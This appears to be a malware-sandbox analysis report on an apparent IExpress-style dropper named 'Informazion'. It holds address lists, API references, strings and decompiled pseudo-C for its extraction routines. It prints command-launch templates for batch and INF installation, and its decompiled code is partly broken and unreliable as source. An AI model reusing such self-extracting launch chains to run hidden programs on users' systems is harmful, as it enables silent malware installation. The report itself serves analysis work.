0x7ff64c5117d1
0x7ff64c5117d3
0x7ff64c5117d7
0x7ff64c5117d9
0x7ff64c5117db
0x7ff64c5117e4
0x7ff64c5117f3
0x7ff64c5117fc
0x7ff64c5117ff
0x7ff64c51180c
0x7ff64c511814
0x7ff64c511821
0x7ff64c51182a
0x7ff64c51182f
0x7ff64c511847
0x7ff64c51185e
0x7ff64c511861
0x7ff64c51186f
0x7ff64c51187c
0x7ff64c511886
0x7ff64c511891
0x7ff64c5118a2
0x7ff64c5118ab
0x7ff64c5118b0
0x7ff64c5118bf
0x7ff64c5118cb
0x7ff64c5118d1
0x7ff64c5118d7
0x7ff64c5118dc
0x7ff64c5118f5
0x7ff64c5118f9
0x7ff64c5118fc
0x7ff64c51190b
0x7ff64c511912
0x7ff64c511924
0x7ff64c511937
0x7ff64c51194d
0x7ff64c51194f
0x7ff64c511961
0x7ff64c511968
0x7ff64c51197a
0x7ff64c51197f
0x7ff64c511984
0x7ff64c51198b
0x7ff64c511993
0x7ff64c511995
0x7ff64c5119ac
0x7ff64c5119b8
0x7ff64c5119ba
0x7ff64c5119c4
0x7ff64c5119c9
0x7ff64c5119d5
0x7ff64c5119e1
0x7ff64c5119e9
0x7ff64c5119ee
0x7ff64c5119f3
0x7ff64c511a00
0x7ff64c511a07
0x7ff64c511a0f
0x7ff64c511a16
0x7ff64c511a23
0x7ff64c511a2b
0x7ff64c511a38
0x7ff64c511a3c
0x7ff64c511a41
0x7ff64c511a5e
0x7ff64c511a60
0x7ff64c511a6a
0x7ff64c511a71
0x7ff64c511a78
0x7ff64c511a7f
0x7ff64c511a81
0x7ff64c511a8e
0x7ff64c511aa0
0x7ff64c511aa2
0x7ff64c511aaa
0x7ff64c511aad
0x7ff64c511aba
0x7ff64c511ac1
0x7ff64c511ac6
0x7ff64c511ad7
0x7ff64c511ae3
0x7ff64c511ae9
0x7ff64c511af0
0x7ff64c511aff
0x7ff64c511b03
0x7ff64c511b16
0x7ff64c511b1d
0x7ff64c511b27
0x7ff64c511b29
0x7ff64c511b2d
0x7ff64c511b2f
0x7ff64c511b31
0x7ff64c511b33
0x7ff64c511b3a
0x7ff64c511b43
0x7ff64c511b47
0x7ff64c511b4d
0x7ff64c511b52
0x7ff64c511b65
0x7ff64c511b77
0x7ff64c511b7c
0x7ff64c511b88
0x7ff64c511b8f
0x7ff64c511b99
0x7ff64c511b9b
0x7ff64c511b9f
0x7ff64c511ba1
0x7ff64c511ba3
0x7ff64c511ba5
0x7ff64c511bac
0x7ff64c511bb5
0x7ff64c511bb9
0x7ff64c511bbf
0x7ff64c511bcc
0x7ff64c511bd1
0x7ff64c511c03

APIs

CompareStringA.KERNEL32 ref: 00007FF64C511838
GetFileAttributesA.KERNEL32 ref: 00007FF64C511852
LocalAlloc.KERNEL32 ref: 00007FF64C5118BF
GetPrivateProfileIntA.KERNEL32 ref: 00007FF64C5118FC
GetPrivateProfileStringA.KERNEL32 ref: 00007FF64C51193F
GetShortPathNameA.KERNEL32 ref: 00007FF64C5119AC

Part of subcall function 00007FF64C514DCC: LoadStringA.USER32 ref: 00007FF64C514E60
Part of subcall function 00007FF64C514DCC: MessageBoxA.USER32 ref: 00007FF64C514EA0

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF64C5117B0
.BAT, xrefs: 00007FF64C511A31
Command.com /c %s, xrefs: 00007FF64C511A60
.INF, xrefs: 00007FF64C51181A
Reboot, xrefs: 00007FF64C5118EB
setupx.dll, xrefs: 00007FF64C5119A5
AdvancedINF, xrefs: 00007FF64C511929
rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 00007FF64C5119CE
setupapi.dll, xrefs: 00007FF64C5119BA
Version, xrefs: 00007FF64C511930
DefaultInstall, xrefs: 00007FF64C5118DC

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 383838535-3544074861
Opcode ID: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
Instruction ID: 27e729e5e08870e6a805eb0b90993c3ca9c66844e1bcfd85f8c5fd5e101226ae
Opcode Fuzzy Hash: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
Instruction Fuzzy Hash: 54E1C026E0C68285EB19BF18A4082BE7FA0EB45794F944177CA6D83796DF3DD529C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C5166C4 Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 299
memorystringCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E00007FF67FF64C5166C4(void* __edi, long long __rbx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r9, void* __r10, long long __r12) {
				void* __rbp;
				char _t71;
				intOrPtr _t81;
				void* _t85;
				char _t88;
				int _t89;
				int _t93;
				signed int _t101;
				char _t104;
				intOrPtr _t117;
				void* _t156;
				intOrPtr _t158;
				intOrPtr _t159;
				char _t165;
				char _t184;
				void* _t191;
				signed long long _t192;
				signed long long _t193;
				long long _t202;
				char* _t213;
				void* _t216;
				void* _t242;
				CHAR* _t250;
				void* _t253;
				signed long long _t254;
				void* _t256;
				void* _t268;
				int _t270;

				_t264 = __r10;
				_t261 = __r9;
				_t256 = __r8;
				_t246 = __rsi;
				_t202 = __rbx;
				_t191 = _t253;
				 *((long long*)(_t191 + 8)) = __rbx;
				 *((long long*)(_t191 + 0x10)) = __rsi;
				 *((long long*)(_t191 + 0x18)) = __rdi;
				 *((long long*)(_t191 + 0x20)) = __r12;
				_t251 = _t191 - 0x78;
				_t254 = _t253 - 0x160;
				_t192 =  *0x4c51c008; // 0xdeba5460e397
				_t193 = _t192 ^ _t254;
				 *(_t191 - 0x78 + 0x50) = _t193;
				r8d = 0;
				_t71 = E00007FF67FF64C515050(_t193, __rbx, "RUNPROGRAM", __rdx, __rsi, _t191 - 0x78);
				LocalAlloc(_t270);
				if (_t193 != 0) goto 0x4c516756;
				 *((intOrPtr*)(_t254 + 0x28)) = 0;
				r9d = 0;
				r8d = 0;
				 *((intOrPtr*)(_t254 + 0x20)) = 0x10;
				E00007FF67FF64C514DCC("RUNPROGRAM", _t256, __r9, __r10);
				 *0x4c51d544 = E00007FF67FF64C517700();
				goto 0x4c516b3a;
				r8d = _t71;
				if (E00007FF67FF64C515050(_t193, _t202, "RUNPROGRAM", _t193, _t246, _t191 - 0x78) != 0) goto 0x4c5167a5;
				 *((intOrPtr*)(_t254 + 0x28)) = 0;
				r9d = 0;
				r8d = 0;
				 *((intOrPtr*)(_t254 + 0x20)) = 0x10;
				E00007FF67FF64C514DCC("RUNPROGRAM", _t256, __r9, __r10);
				LocalFree(_t268);
				 *0x4c51d544 = 0x80070714;
				goto 0x4c51674f;
				lstrcmpA(_t250);
				_t117 =  *0x4c51de60; // 0x0
				r14d = 1;
				_t118 =  ==  ? r14d : _t117;
				 *0x4c51de60 =  ==  ? r14d : _t117;
				LocalFree(??);
				_t81 =  *0x4c51ce1e; // 0x0
				if (_t81 == 0) goto 0x4c516837;
				if (_t81 != 0x5c) goto 0x4c5167fb;
				_t156 =  *0x4c51ce1f - _t81; // 0x0
				r8d = 0;
				if (_t156 == 0) goto 0x4c5167fe;
				r8d = r14d;
				if (E00007FF67FF64C5164E4(0, _t202, 0x4c51ce1e, _t246, _t256) != 0) goto 0x4c516b0f;
				 *((intOrPtr*)(_t254 + 0x28)) = 0;
				r9d = 0;
				r8d = 0;
				 *((intOrPtr*)(_t254 + 0x20)) = 0x10;
				E00007FF67FF64C514DCC(0x4c51ce1e, _t256, _t261, __r10);
				goto 0x4c51674f;
				_t158 =  *0x4c51cd04; // 0x0
				if (_t158 != 0) goto 0x4c516b14;
				_t159 =  *0x4c51de60; // 0x0
				if (_t159 != 0) goto 0x4c516b14;
				r12d = 0x104;
				if (GetTempPathA(??, ??) == 0) goto 0x4c5168ad;
				r8d = 3;
				_t85 = E00007FF67FF64C5164E4(r14d, _t202, 0x4c51d610, _t246, _t256); // executed
				if (_t85 != 0) goto 0x4c516b0f;
				if (E00007FF67FF64C512468(_t202, 0x4c51d610) != 0) goto 0x4c5168ad;
				r8d = r14d;
				if (E00007FF67FF64C5164E4(r14d, _t202, 0x4c51d610, _t246, _t256) != 0) goto 0x4c516b0f;
				_t14 = _t254 + 0x40; // 0x144
				_t248 = "A:\\" - _t14;
				_t15 = _t254 + 0x40; // 0x144
				_t213 = _t15;
				if (__r12 + 0x7ffffefa == 0) goto 0x4c5168e1;
				_t88 =  *((intOrPtr*)("A:\\" - _t14 + _t213));
				_t165 = _t88;
				if (_t165 == 0) goto 0x4c5168e1;
				 *_t213 = _t88;
				_t214 = _t213 + _t268;
				if (_t165 != 0) goto 0x4c5168c4;
				_t18 = _t214 - 1; // 0x59
				_t197 =  !=  ? _t213 + _t268 : _t18;
				 *((char*)( !=  ? _t213 + _t268 : _t18)) = 0;
				if ( *((char*)(_t254 + 0x40)) - 0x5a > 0) goto 0x4c516adb;
				_t89 = GetDriveTypeA(??);
				if (_t89 == 6) goto 0x4c516916;
				if (_t89 != 3) goto 0x4c516930;
				_t216 = _t254 + 0x40;
				if (GetFileAttributesA(??) != 0xffffffff) goto 0x4c5169bd;
				if (_t89 != 2) goto 0x4c5169ad;
				_t23 = _t216 - 0x41; // 0x19
				if (_t23 - r14b <= 0) goto 0x4c5169b1;
				 *((intOrPtr*)(_t254 + 0x34)) = 0;
				 *((intOrPtr*)(_t254 + 0x30)) = 0;
				 *((intOrPtr*)(_t254 + 0x3c)) = 0;
				 *((intOrPtr*)(_t254 + 0x38)) = 0;
				if ( *((intOrPtr*)(_t254 + 0x40)) == 0) goto 0x4c5169b1;
				_t28 = _t254 + 0x38; // 0x13c
				_t29 = _t254 + 0x3c; // 0x140
				 *((long long*)(_t254 + 0x20)) = _t28;
				_t31 = _t254 + 0x30; // 0x134
				_t257 = _t31;
				if (GetDiskFreeSpaceA(??, ??, ??, ??, ??) == 0) goto 0x4c5169ad;
				r8d = 0x400;
				_t93 = MulDiv(??, ??, ??);
				if (_t93 == 0) goto 0x4c5169ad;
				if (_t93 - 0x19000 >= 0) goto 0x4c5169bd;
				 *((char*)(_t254 + 0x40)) =  *((intOrPtr*)(_t254 + 0x40)) + r14b;
				goto 0x4c516ad2;
				r8d = 0;
				_t40 = _t257 + 3; // 0x3
				if (E00007FF67FF64C516CA4(_t40, _t202, _t254 + 0x40, _t193, "A:\\" - _t14, _t31, _t29, __r10) != 0) goto 0x4c5169f4;
				if (E00007FF67FF64C512468(_t202, _t254 + 0x40) != 0) goto 0x4c5169ad;
				r8d = 0;
				if (E00007FF67FF64C516CA4(r14d, _t202, _t254 + 0x40, _t193, "A:\\" - _t14, _t31, _t29, __r10) == 0) goto 0x4c5169ad;
				if (E00007FF67FF64C512468(_t202, _t254 + 0x40) == 0) goto 0x4c516a16;
				GetWindowsDirectoryA(??, ??);
				E00007FF67FF64C517BA8(r12d, _t28, _t202, _t254 + 0x40, "A:\\" - _t14, _t251, "msdownld.tmp");
				if (GetFileAttributesA(??) != 0xffffffff) goto 0x4c516a55;
				_t101 = CreateDirectoryA(??, ??);
				goto 0x4c516a58;
				if ((_t101 & 0x00000010) != 0) goto 0x4c516a6d;
				 *((char*)(_t254 + 0x43)) = 0;
				 *((char*)(_t254 + 0x40)) =  *((intOrPtr*)(_t254 + 0x40)) + r14b;
				goto 0x4c516ad2;
				SetFileAttributesA(??, ??);
				if (__r12 + 0x7ffffefa == 0) goto 0x4c516aaf;
				_t104 =  *((intOrPtr*)(0x4c51d610 + _t254 + 0x40 - 0x4c51d610));
				_t184 = _t104;
				if (_t184 == 0) goto 0x4c516aaf;
				 *0x4c51d610 = _t104;
				_t242 = __r12 - _t268;
				if (_t184 != 0) goto 0x4c516a91;
				_t201 =  !=  ? 0x4c51d610 + _t268 : 0x7ff64c51d60f;
				r8d = 0;
				 *((char*)( !=  ? 0x4c51d610 + _t268 : 0x7ff64c51d60f)) = 0;
				if (E00007FF67FF64C5164E4(r14d, _t202, 0x4c51d610, _t248, _t254 + 0x40 - 0x4c51d610) != 0) goto 0x4c516b0f;
				if ( *((intOrPtr*)(_t254 + 0x40)) - 0x5a <= 0) goto 0x4c5168f9;
				GetWindowsDirectoryA(??, ??);
				_t59 = _t242 + 1; // 0x4
				r8d = _t59;
				if (E00007FF67FF64C516CA4(3, _t202, _t254 + 0x40, _t193, _t248, _t254 + 0x40 - 0x4c51d610, _t29, _t264) == 0) goto 0x4c51674f;
				goto 0x4c5168bc;
				goto 0x4c516b3a;
				 *((long long*)(_t254 + 0x28)) = _t202;
				r8d = 0;
				 *((long long*)(_t254 + 0x20)) = _t202;
				E00007FF67FF64C517AC8( !=  ? 0x4c51d610 + _t268 : 0x7ff64c51d60f, _t202, _t248, _t251, _t254 + 0x40 - 0x4c51d610, 0x7ff64c513530);
				return E00007FF67FF64C518470(0 | ( !=  ? 0x4c51d610 + _t268 : 0x7ff64c51d60f) != 0x00000000,  *((intOrPtr*)(_t254 + 0x40)),  *(_t251 + 0x50) ^ _t254);
			}

0x7ff64c5166c4
0x7ff64c5166c4
0x7ff64c5166c4
0x7ff64c5166c4
0x7ff64c5166c4
0x7ff64c5166c4
0x7ff64c5166c7
0x7ff64c5166cb
0x7ff64c5166cf
0x7ff64c5166d3
0x7ff64c5166dc
0x7ff64c5166e0
0x7ff64c5166e7
0x7ff64c5166ee
0x7ff64c5166f1
0x7ff64c5166f5
0x7ff64c516701
0x7ff64c516710
0x7ff64c516724
0x7ff64c516726
0x7ff64c51672a
0x7ff64c51672d
0x7ff64c516730
0x7ff64c51673f
0x7ff64c516749
0x7ff64c516751
0x7ff64c516756
0x7ff64c51676a
0x7ff64c51676c
0x7ff64c516770
0x7ff64c516773
0x7ff64c516776
0x7ff64c516785
0x7ff64c51678d
0x7ff64c516799
0x7ff64c5167a3
0x7ff64c5167af
0x7ff64c5167bb
0x7ff64c5167c1
0x7ff64c5167c9
0x7ff64c5167cd
0x7ff64c5167d6
0x7ff64c5167e2
0x7ff64c5167ea
0x7ff64c5167ee
0x7ff64c5167f0
0x7ff64c5167f6
0x7ff64c5167f9
0x7ff64c5167fb
0x7ff64c51680e
0x7ff64c516814
0x7ff64c516818
0x7ff64c51681b
0x7ff64c51681e
0x7ff64c51682d
0x7ff64c516832
0x7ff64c516837
0x7ff64c51683d
0x7ff64c516843
0x7ff64c516849
0x7ff64c516856
0x7ff64c516870
0x7ff64c516872
0x7ff64c51687e
0x7ff64c516885
0x7ff64c516895
0x7ff64c516897
0x7ff64c5168a7
0x7ff64c5168b4
0x7ff64c5168b9
0x7ff64c5168bf
0x7ff64c5168bf
0x7ff64c5168ce
0x7ff64c5168d0
0x7ff64c5168d3
0x7ff64c5168d5
0x7ff64c5168d7
0x7ff64c5168d9
0x7ff64c5168df
0x7ff64c5168e4
0x7ff64c5168e8
0x7ff64c5168ec
0x7ff64c5168f3
0x7ff64c5168fe
0x7ff64c51690f
0x7ff64c516914
0x7ff64c516916
0x7ff64c51692a
0x7ff64c516933
0x7ff64c516939
0x7ff64c51693f
0x7ff64c516941
0x7ff64c516945
0x7ff64c516949
0x7ff64c51694d
0x7ff64c516953
0x7ff64c516955
0x7ff64c51695a
0x7ff64c51695f
0x7ff64c516964
0x7ff64c516964
0x7ff64c516981
0x7ff64c516987
0x7ff64c516996
0x7ff64c5169a4
0x7ff64c5169ab
0x7ff64c5169b4
0x7ff64c5169b8
0x7ff64c5169bd
0x7ff64c5169c5
0x7ff64c5169d0
0x7ff64c5169de
0x7ff64c5169e0
0x7ff64c5169f2
0x7ff64c516a00
0x7ff64c516a0a
0x7ff64c516a25
0x7ff64c516a3e
0x7ff64c516a47
0x7ff64c516a53
0x7ff64c516a5a
0x7ff64c516a63
0x7ff64c516a67
0x7ff64c516a6b
0x7ff64c516a77
0x7ff64c516a9b
0x7ff64c516a9d
0x7ff64c516aa1
0x7ff64c516aa3
0x7ff64c516aa5
0x7ff64c516aaa
0x7ff64c516aad
0x7ff64c516ab9
0x7ff64c516abd
0x7ff64c516ac3
0x7ff64c516acc
0x7ff64c516ad5
0x7ff64c516ae3
0x7ff64c516af9
0x7ff64c516af9
0x7ff64c516b04
0x7ff64c516b0a
0x7ff64c516b12
0x7ff64c516b14
0x7ff64c516b20
0x7ff64c516b23
0x7ff64c516b2d
0x7ff64c516b66

APIs

Part of subcall function 00007FF64C515050: FindResourceA.KERNEL32 ref: 00007FF64C515078
Part of subcall function 00007FF64C515050: SizeofResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C515089
Part of subcall function 00007FF64C515050: FindResourceA.KERNEL32 ref: 00007FF64C5150AF
Part of subcall function 00007FF64C515050: LoadResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150C0
Part of subcall function 00007FF64C515050: LockResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150CF
Part of subcall function 00007FF64C515050: memcpy_s.MSVCRT ref: 00007FF64C5150EE
Part of subcall function 00007FF64C515050: FreeResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150FD

LocalAlloc.KERNEL32 ref: 00007FF64C516710
lstrcmpA.KERNEL32 ref: 00007FF64C5167AF
LocalFree.KERNEL32 ref: 00007FF64C5167D6
LocalFree.KERNEL32 ref: 00007FF64C51678D

Part of subcall function 00007FF64C514DCC: LoadStringA.USER32 ref: 00007FF64C514E60
Part of subcall function 00007FF64C514DCC: MessageBoxA.USER32 ref: 00007FF64C514EA0

Part of subcall function 00007FF64C517700: GetLastError.KERNEL32 ref: 00007FF64C517704

GetTempPathA.KERNEL32 ref: 00007FF64C516862
GetDriveTypeA.KERNEL32 ref: 00007FF64C5168FE
GetFileAttributesA.KERNEL32 ref: 00007FF64C51691B
GetDiskFreeSpaceA.KERNEL32 ref: 00007FF64C516973
MulDiv.KERNEL32 ref: 00007FF64C516996
GetWindowsDirectoryA.KERNEL32 ref: 00007FF64C516A0A
GetFileAttributesA.KERNEL32 ref: 00007FF64C516A2F
CreateDirectoryA.KERNEL32 ref: 00007FF64C516A47
SetFileAttributesA.KERNEL32 ref: 00007FF64C516A77
GetWindowsDirectoryA.KERNEL32 ref: 00007FF64C516AE3

Part of subcall function 00007FF64C517AC8: FindResourceA.KERNEL32 ref: 00007FF64C517AF2
Part of subcall function 00007FF64C517AC8: LoadResource.KERNEL32 ref: 00007FF64C517B09
Part of subcall function 00007FF64C517AC8: DialogBoxIndirectParamA.USER32 ref: 00007FF64C517B3F
Part of subcall function 00007FF64C517AC8: FreeResource.KERNEL32 ref: 00007FF64C517B51

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF64C51684F
Z, xrefs: 00007FF64C5168EE
msdownld.tmp, xrefs: 00007FF64C516A16
RUNPROGRAM, xrefs: 00007FF64C5166F8, 00007FF64C516759
<None>, xrefs: 00007FF64C5167A5
A:\, xrefs: 00007FF64C5168AD

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 3973824516-2740620654
Opcode ID: aa749724514e17a92a0630b937cbe188b5289099f860de4be6e22ad4012e2d81
Instruction ID: 19e1521955215e54464789b19a5470e44f4f946893162b12979fe87007d1f2f0
Opcode Fuzzy Hash: aa749724514e17a92a0630b937cbe188b5289099f860de4be6e22ad4012e2d81
Instruction Fuzzy Hash: 17D19F22E1C68287EB18BF2894582BE7FA1FB85740F544136DA6E83795DF3DE925C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C516CA4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215
windowCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E00007FF67FF64C516CA4(signed int __edx, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r9, void* __r10) {
				int _t69;
				int _t72;
				int _t73;
				int _t74;
				unsigned int _t77;
				char _t80;
				void* _t82;
				long _t93;
				char _t133;
				void* _t146;
				signed long long _t147;
				char* _t164;
				int _t181;
				void* _t182;
				void* _t184;
				signed long long _t185;
				void* _t188;
				void* _t191;
				int _t196;
				int _t198;
				CHAR* _t200;
				long _t202;

				_t146 = _t184;
				 *((long long*)(_t146 + 0x10)) = __rbx;
				 *((long long*)(_t146 + 0x18)) = __rsi;
				 *((long long*)(_t146 + 0x20)) = __rdi;
				_t4 = _t146 - 0x2a8; // -428
				_t182 = _t4;
				_t185 = _t184 - 0x380;
				_t147 =  *0x4c51c008; // 0xdeba5460e397
				 *(_t182 + 0x270) = _t147 ^ _t185;
				r12d = __edx;
				r15d = r8d;
				GetCurrentDirectoryA(_t202);
				_t69 = SetCurrentDirectoryA(_t200); // executed
				r13d = r13d ^ r13d;
				if (_t69 != 0) goto 0x4c516d3f;
				 *(_t185 + 0x28) = r13d;
				r9d = 0;
				r8d = 0;
				 *((intOrPtr*)(_t185 + 0x20)) = 0x10;
				E00007FF67FF64C514DCC(__rcx, __r8, __r9, __r10);
				 *0x4c51d544 = E00007FF67FF64C517700();
				goto 0x4c516fe9;
				_t9 = _t185 + 0x4c; // 0x120
				 *(_t185 + 0x44) = r13d;
				_t11 = _t185 + 0x48; // 0x11c
				_t191 = _t11;
				 *((long long*)(_t185 + 0x20)) = _t9;
				_t13 = _t185 + 0x40; // 0x114
				_t188 = _t13;
				 *(_t185 + 0x40) = r13d;
				_t15 = _t185 + 0x44; // 0x118
				_t173 = _t15;
				 *(_t185 + 0x48) = r13d;
				 *(_t185 + 0x4c) = r13d;
				_t72 = GetDiskFreeSpaceA(??, ??, ??, ??, ??); // executed
				if (_t72 == 0) goto 0x4c516f63;
				r14d =  *(_t185 + 0x40);
				r8d = 0x400;
				r14d = r14d *  *(_t185 + 0x44);
				_t73 = MulDiv(_t198, _t196, _t181);
				if (_t73 == 0) goto 0x4c516f63;
				 *(_t185 + 0x38) = r13d;
				_t22 = _t185 + 0x50; // 0x124
				 *(_t185 + 0x30) = _t198;
				r9d = 0;
				 *(_t185 + 0x28) = _t22;
				r8d = 0;
				_t25 = _t185 + 0x54; // 0x128
				 *((long long*)(_t185 + 0x20)) = _t25;
				_t74 = GetVolumeInformationA(??, ??, ??, ??, ??, ??, ??, ??); // executed
				if (_t74 != 0) goto 0x4c516e45;
				r8d = 0x200;
				memset(??, ??, ??);
				 *0x4c51d544 = E00007FF67FF64C517700();
				_t77 = GetLastError();
				 *(_t185 + 0x30) = _t198;
				r9d = 0;
				r8d = _t77;
				 *(_t185 + 0x28) = 0x200;
				_t30 = _t182 + 0x70; // -316
				 *((long long*)(_t185 + 0x20)) = _t30;
				FormatMessageA(??, ??, ??, ??, ??, ??, ??);
				goto 0x4c516fbd;
				SetCurrentDirectoryA(??); // executed
				_t33 = _t185 + 0x58; // 0x12c
				_t34 = _t185 + 0x58; // 0x12c
				_t164 = _t34;
				_t177 = __rcx - _t33;
				_t35 = _t173 - 5; // 0x1
				r9d = _t35;
				_t36 = _t173 - 4; // 0x2
				if (_t36 == 0) goto 0x4c516e86;
				_t80 =  *((intOrPtr*)(__rcx - _t33 + _t164));
				_t133 = _t80;
				if (_t133 == 0) goto 0x4c516e86;
				 *_t164 = _t80;
				_t165 = _t164 + _t191;
				if (_t133 != 0) goto 0x4c516e6c;
				_t38 = _t165 - 1; // 0x12b
				_t156 =  !=  ? _t164 + _t191 : _t38;
				 *((intOrPtr*)( !=  ? _t164 + _t191 : _t38)) = r13b;
				if (r14d == 0x200) goto 0x4c516eae;
				_t82 = (r13w & 0xffffffff) + r9w;
				if (_t82 - 8 < 0) goto 0x4c516e9d;
				if (_t82 != 8) goto 0x4c516ed8;
				 *(_t185 + 0x28) = r13d;
				r9d = 0;
				r8d = 0;
				 *((intOrPtr*)(_t185 + 0x20)) = 0x10;
				E00007FF67FF64C514DCC(_t164 + _t191, _t188, _t191, __r10);
				goto 0x4c516fe9;
				if (( *0x4c51de64 & 0x00000008) == 0) goto 0x4c516f0e;
				if (( *(_t185 + 0x50) & 0x00008000) == 0) goto 0x4c516f0e;
				r8d =  *0x4c51de68; // 0x0
				r8d = r8d >> 2;
				r8d = r8d +  *0x4c51de68;
				goto 0x4c516f22;
				r8d =  *0x4c51de68; // 0x0
				if ((r12d & 0x00000003) != 3) goto 0x4c516f46;
				if (_t188 + _t15 - _t191 - _t73 <= 0) goto 0x4c516f54;
				_t51 = _t185 + 0x58; // 0x12c
				E00007FF67FF64C5124F8(r15d, __rbx, _t15 - _t191, _t188, _t51);
				goto 0x4c516feb;
				if ((r9b & r12b) == 0) goto 0x4c516f4f;
				goto 0x4c516f32;
				goto 0x4c516f32;
				 *0x4c51d544 = r13d;
				goto 0x4c516feb;
				_t54 = _t182 + 0x70; // -316
				r8d = 0x200;
				memset(??, ??, ??);
				 *0x4c51d544 = E00007FF67FF64C517700();
				_t93 = GetLastError();
				 *(_t185 + 0x30) = _t198;
				r9d = 0;
				r8d = _t93;
				 *(_t185 + 0x28) = 0x200;
				_t57 = _t182 + 0x70; // -316
				 *((long long*)(_t185 + 0x20)) = _t57;
				FormatMessageA(??, ??, ??, ??, ??, ??, ??);
				 *(_t185 + 0x28) = r13d;
				_t60 = _t182 + 0x70; // -316
				 *((intOrPtr*)(_t185 + 0x20)) = 0x10;
				E00007FF67FF64C514DCC(_t54, _t177, _t60, __r10);
				SetCurrentDirectoryA(??);
				return E00007FF67FF64C518470(0, 0,  *(_t182 + 0x270) ^ _t185);
			}

0x7ff64c516ca4
0x7ff64c516ca7
0x7ff64c516cab
0x7ff64c516caf
0x7ff64c516cbc
0x7ff64c516cbc
0x7ff64c516cc3
0x7ff64c516cca
0x7ff64c516cd4
0x7ff64c516cdb
0x7ff64c516ceb
0x7ff64c516cee
0x7ff64c516cfd
0x7ff64c516d0b
0x7ff64c516d10
0x7ff64c516d12
0x7ff64c516d17
0x7ff64c516d1a
0x7ff64c516d1d
0x7ff64c516d2a
0x7ff64c516d34
0x7ff64c516d3a
0x7ff64c516d3f
0x7ff64c516d44
0x7ff64c516d49
0x7ff64c516d49
0x7ff64c516d4e
0x7ff64c516d53
0x7ff64c516d53
0x7ff64c516d58
0x7ff64c516d5d
0x7ff64c516d5d
0x7ff64c516d62
0x7ff64c516d67
0x7ff64c516d6c
0x7ff64c516d7a
0x7ff64c516d80
0x7ff64c516d85
0x7ff64c516d8b
0x7ff64c516d98
0x7ff64c516da8
0x7ff64c516dae
0x7ff64c516db3
0x7ff64c516db8
0x7ff64c516dbd
0x7ff64c516dc0
0x7ff64c516dc5
0x7ff64c516dc8
0x7ff64c516dd1
0x7ff64c516dd6
0x7ff64c516de4
0x7ff64c516def
0x7ff64c516df4
0x7ff64c516dfe
0x7ff64c516e04
0x7ff64c516e10
0x7ff64c516e15
0x7ff64c516e18
0x7ff64c516e1b
0x7ff64c516e1f
0x7ff64c516e2a
0x7ff64c516e2f
0x7ff64c516e40
0x7ff64c516e4a
0x7ff64c516e5b
0x7ff64c516e60
0x7ff64c516e60
0x7ff64c516e65
0x7ff64c516e68
0x7ff64c516e68
0x7ff64c516e6c
0x7ff64c516e73
0x7ff64c516e75
0x7ff64c516e78
0x7ff64c516e7a
0x7ff64c516e7c
0x7ff64c516e7e
0x7ff64c516e84
0x7ff64c516e89
0x7ff64c516e92
0x7ff64c516e96
0x7ff64c516ea0
0x7ff64c516ea4
0x7ff64c516eac
0x7ff64c516eb2
0x7ff64c516eb4
0x7ff64c516eb9
0x7ff64c516ebc
0x7ff64c516ebf
0x7ff64c516ece
0x7ff64c516ed3
0x7ff64c516edf
0x7ff64c516ee9
0x7ff64c516eeb
0x7ff64c516efc
0x7ff64c516f05
0x7ff64c516f0c
0x7ff64c516f0e
